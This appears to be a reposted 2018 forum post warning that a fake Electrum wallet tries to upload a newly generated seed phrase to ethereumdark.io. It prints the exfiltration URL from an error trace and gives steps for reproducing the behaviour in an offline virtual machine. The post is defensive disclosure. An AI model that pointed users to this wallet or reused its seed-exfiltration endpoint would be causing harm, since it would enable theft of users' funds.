Saturday, 29 December 2018

caught http://bit.ly/2BMFKuM wallet red-handing trying to steal bitcoin keys!

Before installing electrum god in a virtual machine, I had disconnected its network adapter. The wallet really did not like this, and terminated with the following python error:

urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='ethereumdark.io', port=80): Max retries exceeded with url: /electrum/seeds.php?seed=wife+scar+free+royal+...+grey (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fafcf62cb38>: Failed to establish a new connection: [Errno -2] Name or service not known',))

It immediately tried to reach the ethereumdark.io site with a view on transmitting the electrum seed to the /electrum/seeds.php?seed={seed} script.

If you want to reproduce the thefting attempt, do the following:

[1] install Virtualbox or similar

[2] create a virtual machine

[3] download the wallet from https://electrumgod.org

[4] download system-level dependencies: sudo apt-get install python3-setuptools python3-pyqt5 python3-pip

[5] download python3-level dependencies: cd electrum; sudo python3 -m pip install .

[6] disconnect the virtual machine from the network

[7] run: ./electrum

[8] generate a new seed during first run in the startup wizard

[9] watch the abnormal end while the wallet tries to upload your seed to ethereumdark.io

REMARK: This should remind you that whatever else you do, you should NEVER allow the secrets to touch the network.

That is why it is so important to export unsigned transaction to the network-disconnected signer (virtual) machine, sign the transaction there, and import the signed transaction back to the network-connected viewer (virtual) machine.

In that case, even if the wallet is subverted, corrupted, or infected, it will not be able to steal your secrets.



Submitted December 29, 2018 at 09:49AM by mimblezimble http://bit.ly/2QY7rv2

No comments :

Post a Comment